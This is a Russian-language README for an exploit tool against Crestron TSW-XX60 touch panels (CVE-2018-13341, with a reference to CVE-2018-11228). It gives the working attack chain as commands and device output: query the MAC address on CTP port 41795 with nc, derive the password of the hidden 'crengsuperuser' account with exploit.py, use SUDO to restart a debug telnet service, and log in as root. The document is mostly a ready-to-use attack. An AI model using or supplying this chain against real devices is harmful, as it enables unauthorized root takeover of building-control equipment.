
Этот инструмент предназначен для эксплуатации CVE-2018-13341
Этот инструмент предназначен для эксплуатации CVE-2018-13341. Используя MAC-адрес целевого устройства, вы можете восстановить пароль скрытой учетной записи "crengsuperuser", которая имеет повышенные привилегии и позволяет выполнять команды SUDO.
К протоколу Crestron Toolbox Protocol (CTP) можно подключиться через порт 41795 на устройстве TSW-XX60.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Для работы этого инструмента требуется модуль CryptoGraphy.
# pip3 install cryptography
ИЛИ
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
Уязвимость CVE-2018-11228 позволяет неаутентифицированное удаленное выполнение кода (RCE) через службу Bash Shell в протоколе Crestron Terminal Protocol (CTP). После получения пароля скрытой учетной записи "crengsuperuser" вы можете получить root-доступ на устройстве.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Затем в новом терминале вы можете получить root-доступ на устройстве.
# telnet w.x.y.z
bash# whoami
root
Credit Goes to : axcheron